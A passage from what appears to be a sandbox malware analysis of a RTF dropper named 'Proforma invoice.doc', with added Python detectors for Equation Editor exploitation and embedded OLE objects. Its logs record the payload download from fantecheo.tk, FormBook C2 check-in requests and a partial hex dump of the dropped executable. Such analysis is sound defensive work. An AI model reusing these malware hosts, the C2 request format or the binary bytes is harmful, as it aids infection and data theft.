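                       r"\Content.IE5\ZAE7RW1P\ibefrankzx[1].exe"},
    {"EventID": 11, "Image": EQN_IMAGE, "TargetFilename": r"C:\Users\user\AppData\Roaming\ibefrankhq4862.exe"},
    # Hypothetical follow-on: the dropped PE launched with EQNEDT32.EXE as parent.
    {"EventID": 1, "ParentImage": EQN_IMAGE, "Image": r"C:\Users\user\AppData\Roaming\ibefrankhq4862.exe"},
]

if __name__ == "__main__":
    for eid, subject, hits in scan_events(SAMPLE_EVENTS):
        print(eid, subject, hits)
```

The FileCreate rule is deliberately narrower than "any file written by EQNEDT32.EXE": the Equation Editor legitimately writes temporary files, so the rule keys on an executable extension in a user-writable path. The network and process-spawn rules need no such filter, because neither behaviour is expected from the Equation Editor at all.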

                                                          Static File Info

                                                          General

                                                          File type:Rich Text Format data, unknown version
                                                          Entropy (8bit):3.6680664268152143
                                                          TrID:
                                                          • Rich Text Format (5005/1) 55.56%
                                                          • Rich Text Format (4004/1) 44.44%
                                                          File name:Proforma invoice.doc
                                                          File size:13744
                                                          MD5:5be61511dab1f4f76366f52ca8fec8b1
                                                          SHA1:70a6dd35d6da873242e3c56ff86f000c78614a1f
                                                          SHA256:443ffe0efb43ac5c04e23e749b2908a8e723462f409208e0f4cf35046e3b129d
                                                          SHA512:bd63c51ff9033fd445445dde368b8c2753b82dce3f109125ce7045c67f6834b445e70c23d8c0ab0f6e13bf3588123e22ebbdc6001da8e58e8422188dcb49343e
                                                          SSDEEP:384:ykwSR+sQLj8h1zCyR487af6DobD/UKD+SxBqV4Y:qRo/Hs6sbDmSxWh
                                                          File Content Preview:{\rtf8672`?+^%'.'#>/*#2`]2+3%6=?32.%8??,-#6+1]8%(99.~64/!4?|*'#??.)%8/65#$.!([.^%~??^?~,?,%?%@?/^80@9.(.684:;<,./7?@%-,]]#.~)2.27.*<(^1!_%[)`1:%,!#[.?4<?0>$&*385;2/4'`5_!?2)%=<][7&.)!%.9,7+&`8=|=9/=.'>$?2>1*2[?)*<`_-<*.^^.+3%7`[3<?~]%!%.?11@;8..9?[;/+=.>.

                                                          File Icon

                                                          Icon Hash:e4eea2aaa4b4b4a4

                                                          Static RTF Info

                                                          Objects

Id | Start | Format ID | Format | Classname | Datasize | Filename | Sourcepath | Temppath | Exploit
0 | 000005BBh | | | | | | | | no
1 | 00000572h | | | | | | | | no
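The static parse finds two OLE objects at the listed offsets but recovers no class name, format or data size for either and flags neither as an exploit, while the dynamic run shows EQNEDT32.EXE, the Equation Editor, fetching and dropping a PE; note also that the file is RTF despite its .doc name (see Static File Info). When the static table is this empty an analyst wants to look at the objects directly. As an added example (not the sandbox's own parser) the following Python locates every brace-balanced {\object ...} group, decodes its \objdata hex and parses the OLE1 ObjectHeader as laid out in MS-OLEDS (OLEVersion, FormatID, length-prefixed ClassName/TopicName/ItemName, then NativeDataSize for embedded objects), reporting the same columns as the table plus a flag for the Equation Editor ProgIDs. The sample RTF is constructed inside the block; its two objects are synthetic and are not the objects of the analysed document.

```python
import re
import struct

EQUATION_PROGIDS = {"equation.2", "equation.3"}   # ProgIDs served by EQNEDT32.EXE


def rtf_object_groups(data: bytes):
    """Yield (offset, group_bytes) for every brace-balanced {\\object ...} group."""
    for m in re.finditer(rb"\{\\object\b", data):
        depth = 0
        for i in range(m.start(), len(data)):
            if data[i:i + 1] == b"{":
                depth += 1
            elif data[i:i + 1] == b"}":
                depth -= 1
                if depth == 0:
                    yield m.start(), data[m.start():i + 1]
                    break


def parse_ole1(blob: bytes) -> dict:
    """Parse an OLE1 ObjectHeader (MS-OLEDS) and, for embedded objects, NativeDataSize."""
    off = 0

    def u32() -> int:
        nonlocal off
        (v,) = struct.unpack_from("<I", blob, off)   # struct.error on truncated input
        off += 4
        return v

    def lpstr() -> str:   # LengthPrefixedAnsiString; length counts the terminating NUL
        nonlocal off
        n = u32()
        if n == 0:
            return ""
        if off + n > len(blob):
            raise struct.error("string runs past end of object data")
        s = blob[off:off + n]
        off += n
        return s.rstrip(b"\x00").decode("latin-1")

    info = {"ole_version": u32(), "format_id": u32(),
            "classname": lpstr(), "topicname": lpstr(), "itemname": lpstr()}
    info["format"] = {1: "linked", 2: "embedded", 5: "presentation"}.get(info["format_id"], "unknown")
    if info["format_id"] == 2:
        info["datasize"] = u32()
        info["data_truncated"] = len(blob) - off < info["datasize"]
    return info


def scan_rtf_objects(data: bytes) -> list:
    """One record per {\\object} group, in the shape of the Objects table above."""
    records = []
    for obj_id, (start, group) in enumerate(rtf_object_groups(data)):
        m_class = re.search(rb"\\objclass\s+([^\\{};]+)", group)
        m_data = re.search(rb"\\objdata\s*([0-9A-Fa-f\s]+)", group)
        rec = {"id": obj_id, "start": f"{start:08X}h",
               "objclass": m_class.group(1).strip().decode("latin-1") if m_class else ""}
        if m_data is None:
            rec["status"] = "no objdata"
        else:
            try:
                blob = bytes.fromhex(re.sub(rb"\s", b"", m_data.group(1)).decode("ascii"))
                rec.update(parse_ole1(blob))
                rec["status"] = "ok"
            except (ValueError, struct.error):   # odd-length hex, or header shorter than declared
                rec["status"] = "malformed"
        names = {rec["objclass"].lower(), rec.get("classname", "").lower()}
        rec["equation_editor"] = bool(names & EQUATION_PROGIDS)
        records.append(rec)
    return records


# --- constructed sample RTF (synthetic; not the analysed document) ---------------------
def _ole1_embedded(classname: bytes, native: bytes) -> bytes:
    def lp(s: bytes) -> bytes:
        return struct.pack("<I", len(s) + 1) + s + b"\x00" if s else struct.pack("<I", 0)
    return (struct.pack("<II", 0x501, 2) + lp(classname) + lp(b"") + lp(b"")
            + struct.pack("<I", len(native)) + native)


SAMPLE_RTF = (
    b"{\\rtf1\\ansi"
    + b"{\\object\\objemb{\\*\\objclass Equation.3}{\\*\\objdata "
    + _ole1_embedded(b"Equation.3", b"\x00" * 8 + b"A" * 40).hex().encode() + b"}}"
    + b"{\\object\\objemb{\\*\\objdata "
    + _ole1_embedded(b"", b"\x90" * 16).hex().encode() + b"}}"
    + b"}"
)

if __name__ == "__main__":
    for rec in scan_rtf_objects(SAMPLE_RTF):
        print(rec)
```

A class name can appear in two places, the \objclass control word and the OLE1 header, and exploit documents routinely omit or garble one of them, so the scanner checks both; an object with no class name at all, like the two in this report, is itself worth a closer look rather than a reason to stop.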

                                                          Network Behavior

                                                          Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
09/27/21-14:27:07.928693 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable | | | 192.168.2.22 | 8.8.8.8
09/27/21-14:27:22.379726 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49166 | 80 | 192.168.2.22 | 34.98.99.30
09/27/21-14:27:22.379726 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49166 | 80 | 192.168.2.22 | 34.98.99.30
09/27/21-14:27:22.379726 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49166 | 80 | 192.168.2.22 | 34.98.99.30
09/27/21-14:27:22.497193 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49166 | 34.98.99.30 | 192.168.2.22
09/27/21-14:27:43.013999 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49167 | 80 | 192.168.2.22 | 35.246.6.109
09/27/21-14:27:43.013999 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49167 | 80 | 192.168.2.22 | 35.246.6.109
09/27/21-14:27:43.013999 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49167 | 80 | 192.168.2.22 | 35.246.6.109

                                                          Network Port Distribution

                                                          TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 27, 2021 14:25:37.811347008 CEST | 49165 | 80 | 192.168.2.22 | 185.239.243.112
Sep 27, 2021 14:25:37.835999966 CEST | 80 | 49165 | 185.239.243.112 | 192.168.2.22
Sep 27, 2021 14:25:37.836101055 CEST | 49165 | 80 | 192.168.2.22 | 185.239.243.112
Sep 27, 2021 14:25:37.836704969 CEST | 49165 | 80 | 192.168.2.22 | 185.239.243.112
Sep 27, 2021 14:25:37.860897064 CEST | 80 | 49165 | 185.239.243.112 | 192.168.2.22
Sep 27, 2021 14:25:37.862483978 CEST | 80 | 49165 | 185.239.243.112 | 192.168.2.22
Sep 27, 2021 14:25:37.862552881 CEST | 80 | 49165 | 185.239.243.112 | 192.168.2.22
Sep 27, 2021 14:25:37.862603903 CEST | 80 | 49165 | 185.239.243.112 | 192.168.2.22
Sep 27, 2021 14:25:37.862636089 CEST | 80 | 49165 | 185.239.243.112 | 192.168.2.22
Sep 27, 2021 14:25:37.862668991 CEST | 80 | 49165 | 185.239.243.112 | 192.168.2.22
Sep 27, 2021 14:25:37.862709045 CEST | 80 | 49165 | 185.239.243.112 | 192.168.2.22
Sep 27, 2021 14:25:37.862740040 CEST | 49165 | 80 | 192.168.2.22 | 185.239.243.112
Sep 27, 2021 14:25:37.862746954 CEST | 80 | 49165 | 185.239.243.112 | 192.168.2.22
Sep 27, 2021 14:25:37.862765074 CEST | 49165 | 80 | 192.168.2.22 | 185.239.243.112
Sep 27, 2021 14:25:37.862768888 CEST | 49165 | 80 | 192.168.2.22 | 185.239.243.112
Sep 27, 2021 14:25:37.862771988 CEST | 49165 | 80 | 192.168.2.22 | 185.239.243.112
Sep 27, 2021 14:25:37.862775087 CEST | 49165 | 80 | 192.168.2.22 | 185.239.243.112
Sep 27, 2021 14:25:37.862777948 CEST | 49165 | 80 | 192.168.2.22 | 185.239.243.112
Sep 27, 2021 14:25:37.862802029 CEST | 80 | 49165 | 185.239.243.112 | 192.168.2.22
Sep 27, 2021 14:25:37.862831116 CEST | 49165 | 80 | 192.168.2.22 | 185.239.243.112
Sep 27, 2021 14:25:37.862849951 CEST | 80 | 49165 | 185.239.243.112 | 192.168.2.22
Sep 27, 2021 14:25:37.862869978 CEST | 49165 | 80 | 192.168.2.22 | 185.239.243.112
Sep 27, 2021 14:25:37.862884998 CEST | 80 | 49165 | 185.239.243.112 | 192.168.2.22
Sep 27, 2021 14:25:37.862907887 CEST | 49165 | 80 | 192.168.2.22 | 185.239.243.112
Sep 27, 2021 14:25:37.862930059 CEST | 49165 | 80 | 192.168.2.22 | 185.239.243.112
Sep 27, 2021 14:25:37.875570059 CEST | 49165 | 80 | 192.168.2.22 | 185.239.243.112
Sep 27, 2021 14:25:37.888159037 CEST | 80 | 49165 | 185.239.243.112 | 192.168.2.22
Sep 27, 2021 14:25:37.888202906 CEST | 80 | 49165 | 185.239.243.112 | 192.168.2.22
Sep 27, 2021 14:25:37.888226032 CEST | 80 | 49165 | 185.239.243.112 | 192.168.2.22
Sep 27, 2021 14:25:37.888242960 CEST | 49165 | 80 | 192.168.2.22 | 185.239.243.112
Sep 27, 2021 14:25:37.888247967 CEST | 80 | 49165 | 185.239.243.112 | 192.168.2.22
Sep 27, 2021 14:25:37.888269901 CEST | 49165 | 80 | 192.168.2.22 | 185.239.243.112
Sep 27, 2021 14:25:37.888271093 CEST | 80 | 49165 | 185.239.243.112 | 192.168.2.22
Sep 27, 2021 14:25:37.888273954 CEST | 49165 | 80 | 192.168.2.22 | 185.239.243.112
Sep 27, 2021 14:25:37.888305902 CEST | 49165 | 80 | 192.168.2.22 | 185.239.243.112
Sep 27, 2021 14:25:37.888329029 CEST | 80 | 49165 | 185.239.243.112 | 192.168.2.22
Sep 27, 2021 14:25:37.888370037 CEST | 49165 | 80 | 192.168.2.22 | 185.239.243.112
Sep 27, 2021 14:25:37.888377905 CEST | 80 | 49165 | 185.239.243.112 | 192.168.2.22
Sep 27, 2021 14:25:37.888416052 CEST | 49165 | 80 | 192.168.2.22 | 185.239.243.112
Sep 27, 2021 14:25:37.888461113 CEST | 80 | 49165 | 185.239.243.112 | 192.168.2.22
Sep 27, 2021 14:25:37.888508081 CEST | 49165 | 80 | 192.168.2.22 | 185.239.243.112
Sep 27, 2021 14:25:37.888565063 CEST | 80 | 49165 | 185.239.243.112 | 192.168.2.22
Sep 27, 2021 14:25:37.888614893 CEST | 80 | 49165 | 185.239.243.112 | 192.168.2.22
Sep 27, 2021 14:25:37.888628960 CEST | 49165 | 80 | 192.168.2.22 | 185.239.243.112
Sep 27, 2021 14:25:37.888638020 CEST | 80 | 49165 | 185.239.243.112 | 192.168.2.22
Sep 27, 2021 14:25:37.888655901 CEST | 49165 | 80 | 192.168.2.22 | 185.239.243.112
Sep 27, 2021 14:25:37.888659954 CEST | 80 | 49165 | 185.239.243.112 | 192.168.2.22
Sep 27, 2021 14:25:37.888673067 CEST | 49165 | 80 | 192.168.2.22 | 185.239.243.112
Sep 27, 2021 14:25:37.888679981 CEST | 80 | 49165 | 185.239.243.112 | 192.168.2.22
Sep 27, 2021 14:25:37.888693094 CEST | 49165 | 80 | 192.168.2.22 | 185.239.243.112
Sep 27, 2021 14:25:37.888710022 CEST | 49165 | 80 | 192.168.2.22 | 185.239.243.112
Sep 27, 2021 14:25:37.888771057 CEST | 80 | 49165 | 185.239.243.112 | 192.168.2.22
Sep 27, 2021 14:25:37.888817072 CEST | 49165 | 80 | 192.168.2.22 | 185.239.243.112
Sep 27, 2021 14:25:37.888864040 CEST | 80 | 49165 | 185.239.243.112 | 192.168.2.22
Sep 27, 2021 14:25:37.888911963 CEST | 49165 | 80 | 192.168.2.22 | 185.239.243.112
Sep 27, 2021 14:25:37.888922930 CEST | 80 | 49165 | 185.239.243.112 | 192.168.2.22
Sep 27, 2021 14:25:37.888964891 CEST | 49165 | 80 | 192.168.2.22 | 185.239.243.112
Sep 27, 2021 14:25:37.888973951 CEST | 80 | 49165 | 185.239.243.112 | 192.168.2.22
Sep 27, 2021 14:25:37.889014959 CEST | 49165 | 80 | 192.168.2.22 | 185.239.243.112
Sep 27, 2021 14:25:37.889025927 CEST | 49165 | 80 | 192.168.2.22 | 185.239.243.112
Sep 27, 2021 14:25:37.889056921 CEST | 80 | 49165 | 185.239.243.112 | 192.168.2.22
Sep 27, 2021 14:25:37.889091969 CEST | 80 | 49165 | 185.239.243.112 | 192.168.2.22
Sep 27, 2021 14:25:37.889096975 CEST | 49165 | 80 | 192.168.2.22 | 185.239.243.112
Sep 27, 2021 14:25:37.889131069 CEST | 49165 | 80 | 192.168.2.22 | 185.239.243.112
Sep 27, 2021 14:25:37.889152050 CEST | 80 | 49165 | 185.239.243.112 | 192.168.2.22
                                                          Sep 27, 2021 14:25:37.889195919 CEST4916580192.168.2.22185.239.243.112
                                                          Sep 27, 2021 14:25:37.890089989 CEST4916580192.168.2.22185.239.243.112
                                                          Sep 27, 2021 14:25:37.914339066 CEST8049165185.239.243.112192.168.2.22
                                                          Sep 27, 2021 14:25:37.914378881 CEST8049165185.239.243.112192.168.2.22
                                                          Sep 27, 2021 14:25:37.914400101 CEST8049165185.239.243.112192.168.2.22
                                                          Sep 27, 2021 14:25:37.914422989 CEST8049165185.239.243.112192.168.2.22
                                                          Sep 27, 2021 14:25:37.914426088 CEST4916580192.168.2.22185.239.243.112
                                                          Sep 27, 2021 14:25:37.914444923 CEST8049165185.239.243.112192.168.2.22
                                                          Sep 27, 2021 14:25:37.914469004 CEST8049165185.239.243.112192.168.2.22
                                                          Sep 27, 2021 14:25:37.914491892 CEST8049165185.239.243.112192.168.2.22
                                                          Sep 27, 2021 14:25:37.914491892 CEST4916580192.168.2.22185.239.243.112
                                                          Sep 27, 2021 14:25:37.914509058 CEST4916580192.168.2.22185.239.243.112
                                                          Sep 27, 2021 14:25:37.914513111 CEST4916580192.168.2.22185.239.243.112
                                                          Sep 27, 2021 14:25:37.914514065 CEST8049165185.239.243.112192.168.2.22
                                                          Sep 27, 2021 14:25:37.914516926 CEST4916580192.168.2.22185.239.243.112
                                                          Sep 27, 2021 14:25:37.914536953 CEST4916580192.168.2.22185.239.243.112
                                                          Sep 27, 2021 14:25:37.914539099 CEST8049165185.239.243.112192.168.2.22
                                                          Sep 27, 2021 14:25:37.914561033 CEST4916580192.168.2.22185.239.243.112
                                                          Sep 27, 2021 14:25:37.914561987 CEST8049165185.239.243.112192.168.2.22
                                                          Sep 27, 2021 14:25:37.914582014 CEST8049165185.239.243.112192.168.2.22
                                                          Sep 27, 2021 14:25:37.914583921 CEST4916580192.168.2.22185.239.243.112
                                                          Sep 27, 2021 14:25:37.914606094 CEST8049165185.239.243.112192.168.2.22
                                                          Sep 27, 2021 14:25:37.914608955 CEST4916580192.168.2.22185.239.243.112
                                                          Sep 27, 2021 14:25:37.914628029 CEST8049165185.239.243.112192.168.2.22
                                                          Sep 27, 2021 14:25:37.914629936 CEST4916580192.168.2.22185.239.243.112
                                                          Sep 27, 2021 14:25:37.914652109 CEST4916580192.168.2.22185.239.243.112
                                                          Sep 27, 2021 14:25:37.914653063 CEST8049165185.239.243.112192.168.2.22
                                                          Sep 27, 2021 14:25:37.914674044 CEST4916580192.168.2.22185.239.243.112
                                                          Sep 27, 2021 14:25:37.914674997 CEST8049165185.239.243.112192.168.2.22
                                                          Sep 27, 2021 14:25:37.914696932 CEST8049165185.239.243.112192.168.2.22
                                                          Sep 27, 2021 14:25:37.914699078 CEST4916580192.168.2.22185.239.243.112
                                                          Sep 27, 2021 14:25:37.914719105 CEST8049165185.239.243.112192.168.2.22
                                                          Sep 27, 2021 14:25:37.914724112 CEST4916580192.168.2.22185.239.243.112
                                                          Sep 27, 2021 14:25:37.914751053 CEST4916580192.168.2.22185.239.243.112
                                                          Sep 27, 2021 14:25:37.914766073 CEST8049165185.239.243.112192.168.2.22

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 27, 2021 14:25:37.776082039 CEST | 52167 | 53 | 192.168.2.22 | 8.8.8.8
Sep 27, 2021 14:25:37.789975882 CEST | 53 | 52167 | 8.8.8.8 | 192.168.2.22
Sep 27, 2021 14:27:04.841928005 CEST | 50591 | 53 | 192.168.2.22 | 8.8.8.8
Sep 27, 2021 14:27:05.855655909 CEST | 50591 | 53 | 192.168.2.22 | 8.8.8.8
Sep 27, 2021 14:27:06.170541048 CEST | 53 | 50591 | 8.8.8.8 | 192.168.2.22
Sep 27, 2021 14:27:07.928388119 CEST | 53 | 50591 | 8.8.8.8 | 192.168.2.22
Sep 27, 2021 14:27:22.331332922 CEST | 57805 | 53 | 192.168.2.22 | 8.8.8.8
Sep 27, 2021 14:27:22.360308886 CEST | 53 | 57805 | 8.8.8.8 | 192.168.2.22
Sep 27, 2021 14:27:42.927699089 CEST | 59030 | 53 | 192.168.2.22 | 8.8.8.8
Sep 27, 2021 14:27:42.981733084 CEST | 53 | 59030 | 8.8.8.8 | 192.168.2.22

ICMP Packets

Timestamp | Source IP | Dest IP | Checksum | Code | Type
Sep 27, 2021 14:27:07.928693056 CEST | 192.168.2.22 | 8.8.8.8 | d046 | (Port unreachable) | Destination Unreachable

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Sep 27, 2021 14:25:37.776082039 CEST | 192.168.2.22 | 8.8.8.8 | 0x17df | Standard query (0) | fantecheo.tk | A (IP address) | IN (0x0001)
Sep 27, 2021 14:27:04.841928005 CEST | 192.168.2.22 | 8.8.8.8 | 0xc18c | Standard query (0) | www.urbantennis.info | A (IP address) | IN (0x0001)
Sep 27, 2021 14:27:05.855655909 CEST | 192.168.2.22 | 8.8.8.8 | 0xc18c | Standard query (0) | www.urbantennis.info | A (IP address) | IN (0x0001)
Sep 27, 2021 14:27:22.331332922 CEST | 192.168.2.22 | 8.8.8.8 | 0xfc43 | Standard query (0) | www.lazyguysmarketing.com | A (IP address) | IN (0x0001)
Sep 27, 2021 14:27:42.927699089 CEST | 192.168.2.22 | 8.8.8.8 | 0x9c63 | Standard query (0) | www.visionandcourage.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Sep 27, 2021 14:25:37.789975882 CEST | 8.8.8.8 | 192.168.2.22 | 0x17df | No error (0) | fantecheo.tk | | 185.239.243.112 | A (IP address) | IN (0x0001)
Sep 27, 2021 14:27:06.170541048 CEST | 8.8.8.8 | 192.168.2.22 | 0xc18c | Name error (3) | www.urbantennis.info | none | none | A (IP address) | IN (0x0001)
Sep 27, 2021 14:27:07.928388119 CEST | 8.8.8.8 | 192.168.2.22 | 0xc18c | Name error (3) | www.urbantennis.info | none | none | A (IP address) | IN (0x0001)
Sep 27, 2021 14:27:22.360308886 CEST | 8.8.8.8 | 192.168.2.22 | 0xfc43 | No error (0) | www.lazyguysmarketing.com | lazyguysmarketing.com | | CNAME (Canonical name) | IN (0x0001)
Sep 27, 2021 14:27:22.360308886 CEST | 8.8.8.8 | 192.168.2.22 | 0xfc43 | No error (0) | lazyguysmarketing.com | | 34.98.99.30 | A (IP address) | IN (0x0001)
Sep 27, 2021 14:27:42.981733084 CEST | 8.8.8.8 | 192.168.2.22 | 0x9c63 | No error (0) | www.visionandcourage.com | www193.wixdns.net | | CNAME (Canonical name) | IN (0x0001)
Sep 27, 2021 14:27:42.981733084 CEST | 8.8.8.8 | 192.168.2.22 | 0x9c63 | No error (0) | www193.wixdns.net | balancer.wixdns.net | | CNAME (Canonical name) | IN (0x0001)
Sep 27, 2021 14:27:42.981733084 CEST | 8.8.8.8 | 192.168.2.22 | 0x9c63 | No error (0) | balancer.wixdns.net | 5f36b111-balancer.wixdns.net | | CNAME (Canonical name) | IN (0x0001)
Sep 27, 2021 14:27:42.981733084 CEST | 8.8.8.8 | 192.168.2.22 | 0x9c63 | No error (0) | 5f36b111-balancer.wixdns.net | td-balancer-euw2-6-109.wixdns.net | | CNAME (Canonical name) | IN (0x0001)
Sep 27, 2021 14:27:42.981733084 CEST | 8.8.8.8 | 192.168.2.22 | 0x9c63 | No error (0) | td-balancer-euw2-6-109.wixdns.net | | 35.246.6.109 | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

• fantecheo.tk
• www.lazyguysmarketing.com

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.22 | 49165 | 185.239.243.112 | 80 | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Timestamp | kBytes transferred | Direction | Data
Sep 27, 2021 14:25:37.836704969 CEST | 0 | OUT | GET /ibefrankzx.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: fantecheo.tk
Connection: Keep-Alive
Sep 27, 2021 14:25:37.862483978 CEST | 2 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 27 Sep 2021 12:25:37 GMT
Content-Type: application/x-msdownload
Content-Length: 863744
Last-Modified: Mon, 27 Sep 2021 01:39:56 GMT
Connection: keep-alive
ETag: "615120ec-d2e00"
Accept-Ranges: bytes
                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ae 13 51 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 94 0b 00 00 98 01 00 00 00 00 00 66 b3 0b 00 00 20 00 00 00 c0 0b 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 0d 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 14 b3 0b 00 4f 00 00 00 00 c0 0b 00 54 94 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 0d 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 6c 93 0b 00 00 20 00 00 00 94 0b 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 54 94 01 00 00 c0 0b 00 00 96 01 00 00 96 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 0d 00 00 02 00 00 00 2c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 b3 0b 00 00 00 00 00 48 00 00 00 02 00 05 00 e8 cc 01 00 14 53 02 00 03 00 00 00 8c 02 00 06 fc 1f 04 00 18 93 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 7b 23 00 00 0a 2a 3a 02 28 24 00 00 0a 02 03 7d 23 00 00 0a 2a 00 13 30 03 00 24 00 00 00 01 00 00 11 03 75 01 00 00 1b 0a 06 2c 18 28 25 00 00 0a 02 
7b 23 00 00 0a 06 7b 23 00 00 0a 6f 26 00 00 0a 2b 01 16 2a 76 20 8b e7 6c c3 20 29 55 55 a5 5a 28 25 00 00 0a 02 7b 23 00 00 0a 6f 27 00 00 0a 58 2a 00 00 13 30 07 00 4d 00 00 00 02 00 00 11 14 72 01 00 00 70 17 8d 17 00 00 01 25 16 02 7b 23 00 00 0a 0a 12 00 12 01 fe 15 03 00 00 1b 07 8c 03 00 00 1b 2d 14 71 03 00 00 1b 0b 12 01 07 8c 03 00 00 1b 2d 04 26 14 2b 0b fe 16 03 00 00 1b 6f 28 00 00 0a a2 28 29 00 00 0a 2a 1e 02 7b 2a 00 00 0a 2a 1e 02 7b 2b 00 00 0a 2a 56 02 28 24 00 00 0a 02 03 7d 2a 00 00 0a 02 04 7d 2b 00 00 0a 2a 00 13 30 03 00 3c 00 00 00 03 00 00 11 03 75 04 00 00 1b 0a 06 2c 30 28 25 00 00 0a 02 7b 2a 00 00 0a 06 7b 2a 00 00 0a 6f 26 00 00 0a 2c 18 28 2c 00 00 0a 02 7b 2b 00 00 0a 06 7b 2b 00 00 0a 6f 2d 00 00 0a 2b 01 16 2a d2 20 b6 70 69 7c 20 29 55 55 a5 5a 28 25 00 00 0a 02 7b 2a 00 00 0a 6f 27 00 00 0a 58 20 29 55 55 a5 5a 28 2c 00 00 0a 02 7b 2b 00 00 0a 6f 2e 00 00 0a 58 2a 00 00 00 13 30 07 00 88 00 00 00 04 00 00 11 14 72 25 00 00 70 18 8d 17 00 00 01 25 16 02 7b 2a 00 00 0a 0a 12 00 12 01 fe 15 03 00 00 1b 07 8c 03 00 00 1b 2d 14 71 03 00 00 1b 0b 12 01 07 8c 03 00 00 1b 2d 04 26 14 2b 0b fe 16 03 00 00 1b 6f 28 00 00 0a a2 25 17 02 7b 2b 00 00 0a 0c 12 02 12 03 fe 15 06 00 00 1b 09 8c 06 00 00 1b 2d 14 71 06 00 00 1b 0d 12 03 09 8c 06 00 00 1b 2d 04 26 14 2b 0b fe 16 06 00 00
                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELQa0f @ @OT` H.textl `.rsrcT@@.reloc`,@BHHS{#*:($}#*0$u,(%{#{#o&+*v l )UUZ(%{#o'X*0Mrp%{#-q-&+o(()*{**{+*V($}*}+*0<u,0(%{*{*o&,(,{+{+o-+* pi| )UUZ(%{*o'X )UUZ(,{+o.X*0r%p%{*-q-&+o(%{+-q-&+


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.22 | 49166 | 34.98.99.30 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Sep 27, 2021 14:27:22.379725933 CEST | 917 | OUT | GET /if60/?L0Gd9F=rhh0xc6OYmH3Bp2G4X501Z0vOdzBEjh/MlQjf2DAfTSCIAGZoC8T5uMa8yxQ1kiGUtDxZg==&fDKt=ndxXaN5XDzkTz HTTP/1.1
Host: www.lazyguysmarketing.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Sep 27, 2021 14:27:22.497193098 CEST | 917 | IN | HTTP/1.1 403 Forbidden
Server: openresty
Date: Mon, 27 Sep 2021 12:27:22 GMT
Content-Type: text/html
Content-Length: 275
ETag: "6139ed55-113"
Via: 1.1 google
Connection: close
